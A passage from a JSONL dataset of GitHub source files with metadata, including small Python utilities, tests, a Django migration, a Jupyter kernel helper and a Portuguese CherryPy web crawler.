{}\".format(post))\n\tdb.session.delete(post)\n\tdb.session.commit()\n\tflash('Post successfully deleted! ')\n\treturn redirect(url_for('index'))\n\n\n@app.route('/messages')\n@login_required\ndef messages():\n\treturn render_template('messages.html')","repo_name":"chnihy/instaclone","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":9713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"14627390540","text":"# Definition for singly-linked list.\r\nclass ListNode(object):\r\n def __init__(self, x):\r\n self.val = x\r\n self.next = None\r\n\r\nclass Solution(object):\r\n def hasCycle(self, head):\r\n \"\"\"\r\n :type head: ListNode\r\n :rtype: bool\r\n \"\"\"\r\n if head == None: return False\r\n slow, fast = head, head\r\n while fast.next != None and fast.next.next != None:\r\n slow = slow.next\r\n fast = fast.next.next\r\n if slow is fast: return True\r\n\r\n return False\r\n\r\nif __name__ == \"__main__\":\r\n n3 = ListNode(3)\r\n n2 = ListNode(2)\r\n n0 = ListNode(0)\r\n n_4 = ListNode(-4)\r\n\r\n n3.next = n2\r\n n2.next = n0\r\n n0.next = n_4\r\n n_4.next = n2\r\n\r\n s = Solution()\r\n print(s.hasCycle(n3))\r\n","repo_name":"vikrant1998/Python-World","sub_path":"Linkedlist/HasCycle.py","file_name":"HasCycle.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"5192158911","text":"import jax\nimport jax.numpy as np\nfrom jax.numpy.linalg import eig, inv, matrix_power\nimport s4\n\n\ndef test_ssm():\n N = 4\n L = 8\n I = np.eye(4)\n rng = jax.random.PRNGKey(0)\n # s = s4.S4(L, 2)\n A = s4.make_HiPPO(N)\n B = jax.random.uniform(rng, (N, 1))\n C = jax.random.uniform(rng, (1, N))\n\n ssm = s4.discretize(A, B, C, 1.0 / L)\n out = s4.K_conv(*ssm, L)\n\n out2 = s4.K_gen_simple(*ssm, L=L)\n out2 = s4.convFromGen(out2, L)\n assert np.allclose(out, out2, atol=1e-2, rtol=1e-2)\n\n out3 = s4.K_gen_inverse(*ssm, L=L)\n out3 = s4.convFromGen(out3, L)\n assert np.allclose(out2, out3, atol=1e-2, rtol=1e-2)\n\n u = jax.random.uniform(rng, (L,))\n y2 = s4.scanSSM(\n s4.stepSSM(*ssm), u[:, np.newaxis], np.zeros((ssm[0].shape[0],))\n ).ravel()\n y3 = s4.nonCircularConvolution(u, out)\n assert np.allclose(y2, y3, atol=1e-2, rtol=1e-2)\n\n\ndef test_s4():\n N = 4\n L = 8\n I = np.eye(4)\n\n A2, gamma, p, q, V = s4.make_DPLR_HiPPO(N)\n Vc = V.conj().T\n A = np.diag(gamma) - p[:, np.newaxis] * q[np.newaxis, :].conj()\n A3 = (\n V\n @ (\n np.diag(gamma)\n - (Vc @ p[:, np.newaxis]) @ (Vc @ q[:, np.newaxis].conj()).conj().T\n )\n @ Vc\n )\n A4 = V @ np.diag(gamma) @ Vc - (p[:, np.newaxis] @ q[np.newaxis, :])\n assert np.allclose(A2, A3, atol=1e-2, rtol=1e-2)\n assert np.allclose(A2, A4, atol=1e-2, rtol=1e-2)\n\n rng = jax.random.PRNGKey(0)\n B = jax.random.uniform(rng, (N, 1))\n C = jax.random.uniform(rng, (1, N))\n\n step = 1.0 / L\n ssm = s4.discretize(A, B, C, step)\n\n Abar, _, Cbar = ssm\n Ct = (I - matrix_power(Abar, L)).conj().T @ Cbar.ravel()\n\n out2 = s4.K_gen_simple(*ssm, L=L)\n out2 = s4.convFromGen(out2, L)\n\n K_gen = s4.K_gen_DPLR(gamma, p, q, B, Ct, step)\n out4 = s4.convFromGen(K_gen, L)\n assert np.allclose(out2, out4, atol=1e-2, rtol=1e-2)\n\n # out4 = s.K_gen()\n # out4 = s4.convFromGen(out4, L)\n\n # assert np.allclose(out2, out4, atol=1e-2, rtol=1e-2)\n","repo_name":"srush/annotated-s4","sub_path":"tests/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2026,"program_lang":"python","lang":"en","doc_type":"code","stars":291,"dataset":"github-code","pt":"66"} +{"seq_id":"40160778936","text":"import argparse\n\nfrom Client import Client\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--bank_port\", type=int, required=True)\n args = parser.parse_args()\n\n Client(args.bank_port).launch()\n\n\n\n\n\n","repo_name":"kowalikg/Rozprochy","sub_path":"GRPC_Thrift/client/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"29558711673","text":"def grades(grade):\n \"\"\"This function gives output on student grades\"\"\"\n result = None\n if grade >= 2 and grade < 3:\n result = \"Fail\"\n elif grade < 3.50:\n result = \"Poor\"\n elif grade < 4.50:\n result = \"Good\"\n elif grade < 5.50:\n result = \"Very Good\"\n else:\n result = \"Excellent\"\n\n return result\n\n\nscore = float(input())\nprint(grades(score))","repo_name":"DiyanMarkov/SoftUni-Software-Engineering","sub_path":"Python/Fundamentals/Functions/grades.py","file_name":"grades.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"15694066932","text":"from loguru import logger\n\nlogger.debug('This is debug information')\nlogger.info('This is info information')\nlogger.warning('This is warn information')\nlogger.error('This is error information')\n\nlogger.add(\"./test1.log\", rotation=\"1000KB\", encoding=\"utf-8\", enqueue=True, retention=\"10 days\", level='INFO')\nlogger.info('This is info information')\n\n# f-string\nlogger.info('If you are using Python {version}, prefer {feature} of course!', version='3.10', feature='loguru')\n\n\n# 只輸出到文本,不在 console 輸出\n# 清除之前的設置\nlogger.remove(handler_id=None) \n\ntrace= logger.add('test2.log')\n\nlogger.error('This is error information')\nlogger.warning('This is warn information')\n\n# compression 配置日誌壓縮格式\ntrace = logger.add('zip.log', compression='zip')\nlogger.warning('This is warn information')\n\n# 只存 error log\ndef error_only(record):\n \"\"\"\n error 日誌 判斷 \n Args:\n record: \n\n Returns: 若日誌級別爲ERROR, 輸出TRUE\n\n \"\"\"\n return record[\"level\"].name == \"ERROR\"\n\n# ERROR以外級別日誌被過濾掉\nlogger.add(\"error.log\", filter=error_only)\n\nlogger.error('This is error information')\nlogger.warning('This is warn information')\n\n\n\n","repo_name":"EricTsai83/logging","sub_path":"easy_logging_by_using_loguru/easy_logging.py","file_name":"easy_logging.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"1039495616","text":"from airflow.decorators import dag, task\nfrom datetime import datetime, timedelta\n\nfrom airflow.operators.bash import BashOperator\n\nfrom src.google_drive_handler import send_image_from_disk, move_file_to_folder, delete_from_google_drive, \\\n download_jpg_file, delete_trash, send_csv_from_disk\n\ndefault_args = {\n 'owner': 'kowal',\n 'retry': 3,\n 'retry_delay': timedelta(minutes=3)\n}\n\n\n@dag(\n dag_id='example_final_dag',\n default_args=default_args,\n catchup=False,\n schedule_interval='37 13 * * *',\n start_date=datetime(2023, 4, 10),\n tags=['google_drive', 'postgres', 'bash']\n)\ndef final_dag():\n @task()\n def send_fiona_image():\n send_image_from_disk(\"pieski/zdjecia_fiony/fiona.jpg\")\n\n @task()\n def send_grzanka_image():\n send_image_from_disk(\"pieski/zdjecia_grzanki/grzanka.jpg\")\n\n @task()\n def send_csv():\n send_csv_from_disk(\"csv1/csv1/test_file.csv\")\n\n @task()\n def move_grzanka_image():\n move_file_to_folder(\"pieski/zdjecia_grzanki/grzanka.jpg\", \"pieski/zdjecia_fiony\")\n\n @task()\n def delete_csv():\n delete_from_google_drive(\"csv1/csv1\")\n\n @task()\n def download_fiona_image():\n return download_jpg_file(\"pieski/zdjecia_fiony/fiona.jpg\", \"/downloaded_fiona\")\n\n @task()\n def download_grzanka_image():\n return download_jpg_file(\"pieski/zdjecia_fiony/grzanka.jpg\", \"/downloaded_grzanka\")\n\n @task()\n def delete_trash_from_google_drive():\n delete_trash()\n\n sleep_task = BashOperator(\n task_id='sleep',\n bash_command='sleep 30'\n )\n\n [send_grzanka_image() >> send_fiona_image(), send_csv()] >> sleep_task\n sleep_task >> delete_csv() >> delete_trash_from_google_drive()\n sleep_task >> move_grzanka_image() >> [download_grzanka_image(), download_fiona_image()]\n\n\nfinal_dag()\n","repo_name":"krkowal/AirflowProject","sub_path":"dags/example_final_demo.py","file_name":"example_final_demo.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"25900091022","text":"''' “I was driving on the highway the other day and I happened to notice my odometer.\nLike most odometers, it shows six digits, in whole miles only. So, if my car had 300,000\nmiles, for example, I’d see 3-0-0-0-0-0.\n“Now, what I saw that day was very interesting. I noticed that the last 4 digits were\npalindromic; that is, they read the same forward as backward. For example, 5-4-4-5 is a\npalindrome, so my odometer could have read 3-1-5-4-4-5.\n“One mile later, the last 5 numbers were palindromic. For example, it could have read\n3-6-5-4-5-6. One mile after that, the middle 4 out of 6 numbers were palindromic. And\nyou ready for this? One mile later, all 6 were palindromic!\n“The question is, what was on the odometer when I first looked?”\nWrite a Python program that tests all the six-digit numbers and prints any numbers that satisfy\nthese requirements.'''\n\n\n\ndef ispal(n,start,end):\n s=str(n)\n s1=s[start:end+1]\n s2=s1[::-1]\n return s1==s2\n\ndef check(n):\n return(ispal(n,2,5) and ispal(n+1,1,5) and ispal(n+2,1,4) and ispal(n+3,0,5))\n\ndef check_all():\n i=100000\n while i<1000000:\n if check(i):\n print(i)\n i=i+1\n\nprint('Possible Solutions are:')\ncheck_all()\n\n'''Possible Solutions are:\n198888\n199999'''\n","repo_name":"sahilrider/Python-Codes","sub_path":"Puzzle1.Py","file_name":"Puzzle1.Py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","stars":102,"dataset":"github-code","pt":"66"} +{"seq_id":"21680947142","text":"#!/usr/bin/env python\n\nimport argparse\nimport sys\n\nparser = argparse.ArgumentParser(\"TaxFastaConsensus identifies and removes sequences which don't have taxonomic lineages and lineages which don't have corresponding sequences\")\nparser.add_argument('-it', '--InTax', required = True, help = \"\\nInput taxnomic lineages (tab-delimited)\\n\")\nparser.add_argument('-if', '--InFasta', required = True, help = \"\\nInput sequences in fasta format\\n\")\nparser.add_argument('-ot', '--OutTax', required = True, help = \"\\nFilename for output taxonomic lineages\\n\")\nparser.add_argument('-of', '--OutFasta', required = True, help = \"\\nFilename for output fasta formatted sequences\\n\")\nargs = parser.parse_args()\n\nInTax = {}\nwith open(args.InTax, 'r') as InputTax:\n\tfor line in InputTax:\n\t\tInTax[line.strip().split('\\t')[0]] = line.strip().split('\\t')[1]\n\nInFasta = {}\nwith open(args.InFasta, 'r') as InputFasta:\n\tfor line in InputFasta:\n\t\tif not line.strip():\n\t\t\tcontinue\n\t\tif line.startswith('>'):\n\t\t\tif str(line.strip())[1:] not in InFasta:\n\t\t\t\theader = str(line.strip())[1:]\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tsys.stderr.write('\\n# WARNING: TaxFastCons: duplicate sequence header skipped - ' + str(line.strip())[1:])\n\t\tInFasta[header] = line.strip()\n\nOutTax = {}\nfor key in InTax:\n\tif key in InFasta:\n\t\tOutTax[key] = InTax[key]\n\nOutFasta = {}\nfor key in InFasta:\n\tif key in InTax:\n\t\tOutFasta[key] = InFasta[key]\n\nwith open(args.OutTax, 'w') as OutputTax:\n\tfor key in OutTax:\n\t\tOutputTax.write(key + '\\t' + OutTax[key] + '\\n')\n\nwith open(args.OutFasta, 'w') as OutputFasta:\n\tfor key in OutFasta:\n\t\tOutputFasta.write('>' + key + '\\n' + OutFasta[key] + '\\n')\n","repo_name":"RTRichar/MetaCurator","sub_path":"TaxFastaConsensus.py","file_name":"TaxFastaConsensus.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"66"} +{"seq_id":"8658576303","text":"BUTTONS=(\n \"LEFT\",\n \"RIGHT\",\n \"UP\",\n \"DOWN\",\n \"RED\",\n \"GREEN\",\n \"YELLOW\",\n \"BLUE\",\n \"CHANNELUP\",\n \"CHANNELDOWN\",\n \"VOLUMEUP\",\n \"VOLUMEDOWN\",\n \"PLAY\",\n \"PAUSE\",\n \"STOP\",\n \"REWIND\",\n \"FASTFORWARD\",\n \"ASTERISK\",\n \"BACK\",\n \"EXIT\",\n \"ENTER\",\n \"AMAZON\",\n \"NETFLIX\",\n \"3D_MODE\",\n \"AD\", # Audio Description toggle\n \"ADVANCE_SETTING\",\n \"ALEXA\", # Amazon Alexa\n \"AMAZON\", # Amazon Prime Video app\n \"ASPECT_RATIO\", # Quick Settings Menu - Aspect Ratio\n \"CC\", # Closed Captions\n \"DASH\", # Live TV\n \"EMANUAL\", # User Guide\n \"EZPIC\", # Pictore mode preset panel\n \"EZ_ADJUST\", # EzAdjust Service Menu\n \"EYE_Q\", # Energy saving panel\n \"GUIDE\",\n \"HCEC\", # SIMPLINK toggle\n \"HOME\", # Home Dashboard\n \"INFO\", # Info button\n \"IN_START\", # InStart Service Menu\n \"INPUT_HUB\", # Home Dashboard\n \"IVI\",\n \"LIST\", # Live TV\n \"LIVE_ZOOM\", # Live Zoom\n \"MAGNIFIER_ZOOM\", # Focus Zoom\n \"MENU\", # Quick Settings Menu\n \"MUTE\",\n \"MYAPPS\", # Home Dashboard\n \"NETFLIX\", # Netflix app\n \"POWER\", # Power button\n \"PROGRAM\", # TV Guide\n \"QMENU\", # Quick Settings Menu\n \"RECENT\", # Home Dashboard - Recent Apps or last app\n \"RECLIST\", # Recording list\n \"RECORD\",\n \"SAP\", # Multi Audio Setting\n \"SCREEN_REMOTE\", # More Actions panel\n \"SEARCH\",\n \"SOCCER\", # Sport preset\n \"TELETEXT\",\n \"TEXTOPTION\",\n \"TIMER\", # Sleep Timer panel\n \"TV\",\n \"TWIN\", # Twin View\n \"UPDOWN\", # Always Ready app\n \"USP\", # Movie, TVshow, app list\n \"YANDEX\",\n \"0\",\n \"1\",\n \"2\",\n \"3\",\n \"4\",\n \"5\",\n \"6\",\n \"7\",\n \"8\",\n \"9\"\n)\n","repo_name":"chros73/bscpylgtv","sub_path":"bscpylgtv/buttons.py","file_name":"buttons.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","stars":96,"dataset":"github-code","pt":"66"} +{"seq_id":"37137544504","text":"from Stack_and_Queue.stack_and_queue import Queue\nfrom trees.trees import BinaryTree, TNode\n\n\ndef breadth_first(root):\n if not isinstance(root, TNode):\n raise Exception\n queue = Queue()\n queue.enqueue(root)\n arr = []\n while not queue.is_empty():\n front = queue.dequeue()\n arr.append(front.value)\n if front.left:\n queue.enqueue(front.left)\n if front.right:\n queue.enqueue(front.right)\n return arr\n\n\nif __name__ == \"__main__\":\n tree = BinaryTree()\n tree.root = TNode(2)\n tree.root.left = TNode(7)\n tree.root.right = TNode(5)\n tree.root.left.left = TNode(2)\n tree.root.left.right = TNode(6)\n tree.root.right.left = TNode(9)\n tree.root.right.left.left = TNode(4)\n print(breadth_first(tree.root))\n","repo_name":"Ahmad-Khaled-Zaid/data-structures-and-algorithms-python","sub_path":"tree_breadth_first/tree_breadth_first.py","file_name":"tree_breadth_first.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"39230006800","text":"from io import StringIO\nimport sys, os\nimport cadabra2\n\nfrom cadabra2_jupyter import SITE_PATH\n\n# super important\n__cdbkernel__ = cadabra2.__cdbkernel__\n\n#  setup stdout, stderr hook\nclass _StdCatch:\n def __init__(self, kernel):\n self._kernel = kernel\n\n def __enter__(self):\n sys.stdout = self.stdout = StringIO()\n sys.stderr = self.stderr = StringIO()\n\n def __exit__(self, exc_type, exc_val, exc_traceback):\n sys.stdout = sys.__stdout__\n sys.stderr = sys.__stderr__\n\n for line in self.stdout.getvalue().splitlines():\n # insert missing newline\n self._kernel._send_code(line + \"\\n\")\n\n # ignore exc_type reporting, since it always gives 'JSON serializable'\n # error, echoing the same message as provided by the __stderr__ catch\n for line in self.stderr.getvalue().splitlines():\n # insert missing newline\n self._kernel._send_error(line + \"\\n\")\n\n\nclass SandboxContext:\n def __init__(self, kernel):\n self._sandbox = {\n \"server\": kernel._cdb_server,\n \"__cdbkernel__\": cadabra2.__cdbkernel__,\n }\n with open(os.path.join(SITE_PATH, \"cadabra2_defaults.py\")) as f:\n code = compile(f.read(), \"cadabra2_defaults.py\", \"exec\")\n exec(code, self._sandbox)\n\n self._kernel = kernel\n self._context = _StdCatch(kernel)\n\n def __call__(self, code):\n # redefine, as is catastrophic if accidentally overwritten\n self._sandbox[\"server\"] = self._kernel._cdb_server\n with self._context:\n exec(code, self._sandbox)\n\n @property\n def namespace(self):\n return self._sandbox.keys()\n","repo_name":"kpeeters/cadabra2","sub_path":"jupyterkernel/cadabra2_jupyter/context.py","file_name":"context.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","stars":195,"dataset":"github-code","pt":"66"} +{"seq_id":"41650848092","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('modeling', '0005_auto_20150608_1502'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='scenario',\n name='inputs',\n field=models.TextField(help_text='Serialized JSON representation of scenario inputs', null=True),\n ),\n migrations.AlterField(\n model_name='scenario',\n name='modifications',\n field=models.TextField(help_text='Serialized JSON representation of scenarios modifications ', null=True),\n ),\n ]\n","repo_name":"project-icp/bee-pollinator-app","sub_path":"src/icp/apps/modeling/migrations/0006_auto_20150630_1320.py","file_name":"0006_auto_20150630_1320.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"66"} +{"seq_id":"39147846133","text":"# -*- coding: latin1 -*- \nimport cherrypy\nfrom bs4 import BeautifulSoup\nfrom time import strftime\nfrom shutil import rmtree\nfrom urllib.parse import unquote\nimport urllib.request\nimport webbrowser\nimport os\nimport sys\n \nclass WelcomePage:\n\n\t#pagina inicial\n\tdef index(self):\n\t\tarq = open('c:/py/pi4/index.html', 'r', encoding='latin1')\n\t\ttela = arq.read()\n\t\ttela = tela.encode('latin-1').decode('utf-8')\n\t\tarq.close()\n\t\treturn tela\n\tindex.exposed = True\n\t\n\t#pagina de \"carregando\"\n\tdef carregando(self, hdnValidacao=None, txtPesquisa=None, btnPesquisar=None):\n\t\tarq = open('c:/py/pi4/carregando.html', 'r', encoding='latin1')\n\t\ttela = arq.read()\n\t\ttela = tela.encode('latin-1').decode('utf-8')\n\t\ttela = tela.replace('::site::', str(txtPesquisa))\n\t\tarq.close()\n\t\treturn tela\n\tcarregando.exposed = True\n \n\t#pagina de resultado\n\tdef resultado(self, hdnTxtSite=None, hdnTxtInicio=None, hdnTxtFim=None, hdnTxtTipoCategorizacao=None, hdnTxtCategoria=None, hdnTxtLinksInternos=None, hdnTxtLinksExternos=None, hdnDiretorio=None, hdnTxtCaminhoImagens=None, hdnTxtCaminhoArquivos=None, hdnTxtPalavras=None):\n\t\t# Organiza em ordem alfabetica e retira links duplicados\n\t\tdef trataArray(seq):\n\t\t\tseq.sort()\n\t\t\tnoDupes = []\n\t\t\t[noDupes.append(i) for i in seq if not noDupes.count(i)]\n\t\t\treturn noDupes\n\t\t\n\t\tarq = open('c:/py/pi4/resultado.html', 'r', encoding='latin1')\n\t\ttela = arq.read()\n\t\t\n\t\t# ------- LINKS INTERNOS -------\n\t\thdnTxtLinksInternos = unquote(hdnTxtLinksInternos)\n\t\taux_links_internos_categorias = []\n\t\tlinks_internos_categorias = \"\"\n\t\tlinks_internos = \"\"\n\t\tlinks = hdnTxtLinksInternos.split('<##>')\n\t\t\n\t\tfor contador in range(len(links)-1):\n\t\t\tlink = links[contador].split(\"<#>\")\n\t\t\tif link[1] == \"\":\n\t\t\t\tlink[1] = \"Não Classificado\"\n\t\t\taux_links_internos_categorias.append(link[1])\n\t\t\tlinks_internos = links_internos + ''\n\t\t\n\t\taux_links_internos_categorias = trataArray(aux_links_internos_categorias)\n\t\tfor contador in range(len(aux_links_internos_categorias)):\n\t\t\tif aux_links_internos_categorias[contador].replace(\" \", \"_\") == \"\":\n\t\t\t\taux_links_internos_categorias[contador] = \"Não classificado\"\n\t\t\tlinks_internos_categorias = links_internos_categorias + '
        ' + aux_links_internos_categorias[contador] + '
        '\n\t\t\tif contador == len(aux_links_internos_categorias) - 1:\n\t\t\t\tbreak;\n\t\t# ------------------------------\n\t\t# ------- LINKS EXTERNOS -------\n\t\thdnTxtLinksExternos = unquote(hdnTxtLinksExternos)\n\t\taux_links_externos_categorias = []\n\t\tlinks_externos_categorias = \"\"\n\t\tlinks_externos = \"\"\n\t\tlinks = hdnTxtLinksExternos.split('<##>')\n\t\t\n\t\tfor contador in range(len(links)-1):\n\t\t\tlink = links[contador].split(\"<#>\")\n\t\t\taux_links_externos_categorias.append(link[1])\n\t\t\tlinks_externos = links_externos + ''\n\t\t\n\t\taux_links_externos_categorias = trataArray(aux_links_externos_categorias)\n\t\tfor contador in range(len(aux_links_externos_categorias)):\n\t\t\tif aux_links_externos_categorias[contador].replace(\" \", \"_\") == \"\":\n\t\t\t\taux_links_externos_categorias[contador] = \"Não classificado\"\n\t\t\tlinks_externos_categorias = links_externos_categorias + '
        ' + aux_links_externos_categorias[contador] + '
        '\n\t\t\tif contador == len(aux_links_externos_categorias) - 1:\n\t\t\t\tbreak;\n\t\t# ------------------------------\n\t\t# ---------- IMAGENS -----------\n\t\thdnTxtCaminhoImagens = unquote(hdnTxtCaminhoImagens)\n\t\timagens = hdnTxtCaminhoImagens.split('<#>')\n\t\t\n\t\timagem_pequena = \"\"\n\t\timagem_grande = \"\"\n\t\t\n\t\tfor contador in range(len(imagens)-1):\n\t\t\timagem = imagens[contador]\n\t\t\timagem_pequena = imagem_pequena + '
        '\n\t\t\timagem_grande = imagem_grande + ''\n\t\t# ------------------------------\n\t\t# ---------- ARQUIVOS ----------\n\t\taux_arquivos = \"\"\n\t\thdnTxtCaminhoArquivos = unquote(hdnTxtCaminhoArquivos)\n\t\tarquivos = hdnTxtCaminhoArquivos.split('<#>')\n\t\t\n\t\tfor contador in range(len(arquivos)-1):\n\t\t\tarquivo = arquivos[contador].split('<##>')\n\t\t\taux_arquivos = aux_arquivos + ''\n\t\t# ------------------------------\n\t\t\n\t\t# -----> URL DECODE + COLOCAR NA PÁGINA <-----\n\t\ttela = tela.encode('latin-1').decode('utf-8')\n\t\ttela = tela.replace('::site::', str(unquote(hdnTxtSite)))\n\t\ttela = tela.replace('::inicio::', str(unquote(hdnTxtInicio)))\n\t\ttela = tela.replace('::termino::', str(unquote(hdnTxtFim)))\n\t\ttela = tela.replace('::metodo::', str(unquote(hdnTxtTipoCategorizacao)))\n\t\ttela = tela.replace('::classificacao::', str(unquote(hdnTxtCategoria)))\n\t\t\n\t\ttela = tela.replace('::palavras_decisivas::', str(unquote(hdnTxtPalavras)))\n\t\t\n\t\ttela = tela.replace('::internos_categorias::', str(links_internos_categorias))\n\t\ttela = tela.replace('::internos_links::', str(links_internos))\n\t\t\n\t\ttela = tela.replace('::externos_categorias::', str(links_externos_categorias))\n\t\ttela = tela.replace('::externos_links::', str(links_externos))\n\t\t\n\t\ttela = tela.replace('::imagem_pequena::', str(imagem_pequena))\n\t\ttela = tela.replace('::imagem_grande::', str(imagem_grande))\n\t\t\n\t\ttela = tela.replace('::arquivos::', str(aux_arquivos))\n\t\t# -----> /URL DECODE <-----\n\t\t\n\t\tarq.close()\n\t\treturn tela\n\tresultado.exposed = True\n\t\n\t#pagina de erro na URL\n\tdef erro(self, hdnTxtSite=None):\n\t\tarq = open('c:/py/pi4/erro.html', 'r', encoding='latin1')\n\t\ttela = arq.read()\n\t\ttela = tela.encode('latin-1').decode('utf-8')\n\t\ttela = tela.replace('::site::', str(hdnTxtSite))\n\t\tarq.close()\n\t\treturn tela\n\terro.exposed = True\n\t\n\t#inicio do crawler\n\tdef inicio(self, hdnTxtPesquisa=None):\n\t\n\t\tdef numeroImagem():\n\t\t\tarq = open('c:/py/pi4/conf_imagem.txt', 'r')\n\t\t\tnumero = arq.read()\n\t\t\tarq.close()\n\t\t\tarq = open('c:/py/pi4/conf_imagem.txt', 'w')\n\t\t\tarq.write(str(int(numero) + 1))\n\t\t\tarq.close()\n\t\t\treturn numero\n\t\t\t\n\t\t# Organiza em ordem alfabetica e retira links duplicados\n\t\tdef trataArray(seq):\n\t\t\tseq.sort()\n\t\t\tnoDupes = []\n\t\t\t[noDupes.append(i) for i in seq if not noDupes.count(i)]\n\t\t\treturn noDupes\n\n\t\t# Adiciona um texto em um arquivo\n\t\tdef escreveArq(caminho, texto, modo):\n\t\t\ttry:\n\t\t\t\tarq = open(caminho, modo, encoding='latin1')\n\t\t\t\tarq.write(texto)\n\t\t\t\tarq.close()\n\t\t\t\treturn True\n\t\t\texcept:\n\t\t\t\treturn False\n\n\t\t# Faz a leitura do arquivo de configuracao das categorias\t\t\n\t\tdef leituraConf(conf):\n\t\t\tarq = open(conf,\"r\", encoding='latin1')\n\t\t\tcategorias = []\n\t\t\tcontador = 0\n\t\t\twhile True:\n\t\t\t\tline = arq.readline()\n\t\t\t\tif not line:\n\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\tif(line != ''):\n\t\t\t\t\t\tif line[:1] == '@':\n\t\t\t\t\t\t\tcategorias.append([line[1:].strip().upper(), 0, [], []])\n\t\t\t\t\t\t\tcontador += 1\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tcategorias[contador - 1][2].append(line.strip().lower())\n\t\t\t#Nome da categoria / Quantidade de palavras chaves / Lista de palavras / Lista de links\n\t\t\treturn categorias\n\t\t\t\n\t\tdef leituraHtmlBase(html_base):\n\t\t\thtml = \"\"\n\t\t\tarq = open(html_base,\"r\", encoding='latin1')\n\t\t\twhile True:\n\t\t\t\tline = arq.readline()\n\t\t\t\tif not line:\n\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\tif(line != ''):\n\t\t\t\t\t\thtml += line\n\t\t\treturn html\n\n\t\t#Extrai a extensao do arquivo passado, se nao for um arquivo, ate primeiro ponto encontrado de tras para frente\n\t\tdef extraiExtensao(texto):\n\t\t\textensao = \"\"\n\t\t\taux = \"\"\n\t\t\tcontador = 1\n\t\t\twhile contador <= len(texto):\n\t\t\t\taux = texto[len(texto) - contador]\n\t\t\t\tif aux != \".\":\n\t\t\t\t\textensao = str(aux) + str(extensao)\n\t\t\t\t\tcontador = contador + 1\n\t\t\t\telse:\n\t\t\t\t\tbreak\n\t\t\treturn extensao\n\t\t\t\n\t\tdef trataUrlLink(url, link):\n\t\t\tfinal = \"\"\n\t\t\tif link:\n\t\t\t\tlink = link.strip()\n\t\t\t\turl = url.strip()\n\t\t\t\tif link != \"#\":\n\t\t\t\t\tif link[:7] != \"http://\" and link[:8] != \"https://\":\n\t\t\t\t\t\tif url[-4:] == \".php\" or url[-5:] == \".html\" or url[-4:] == \".htm\" or url[-4:] == \".asp\" or url[-4:] == \".jsp\":\n\t\t\t\t\t\t\taux = \"\"\n\t\t\t\t\t\t\tcontador = 1\n\t\t\t\t\t\t\twhile contador <= len(url):\n\t\t\t\t\t\t\t\taux = url[len(url) - contador]\n\t\t\t\t\t\t\t\tif aux == \"/\":\n\t\t\t\t\t\t\t\t\tif link[:1] != \"/\":\n\t\t\t\t\t\t\t\t\t\tfinal += url[:(1-contador)] + link\n\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\tfinal += url[:(1-contador)] + link[1:]\n\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tcontador = contador + 1\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tfinal = url\n\t\t\t\t\t\t\tif final[-1:] == \"/\":\n\t\t\t\t\t\t\t\tif link[:1] != \"/\":\n\t\t\t\t\t\t\t\t\tfinal += link\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tfinal += link[1:]\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tif link[:1] != \"/\":\n\t\t\t\t\t\t\t\t\tfinal += \"/\" + link\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tfinal += link\n\t\t\t\t\telse:\n\t\t\t\t\t\tfinal = link\n\t\t\treturn final\n\t\t\t\n\t\tdef categorizarPagina(soup, lista_categorias):\n\t\t\tmeta_keywords_encontrado = False\n\t\t\tkeywords = \"\"\n\t\t\t\n\t\t\tquantidade_1 = 0\n\t\t\tquantidade_2 = 0\n\t\t\tquantidade_3 = 0\n\t\t\tretorno = []\n\t\t\tretorno.append(\"\") #Tipo de categorizacao\n\t\t\tretorno.append(0) #Quantidade de palavras-chaves encontradas (principal)\n\t\t\tretorno.append(\"\") #Categoria definida (principal)\n\t\t\tretorno.append(0) #Quantidade de palavras-chaves encontradas (secundaria)\n\t\t\tretorno.append(\"\") #Categoria definida (secundaria)\n\t\t\tretorno.append(0) #Quantidade de palavras-chaves encontradas (terciaria)\n\t\t\tretorno.append(\"\") #Categoria definida (terciaria)\n\t\t\t\n\t\t\tretorno.append(0) #Quantidade de palavras mais encontrada (1)\n\t\t\tretorno.append(\"\") #Palavra mais encontrada 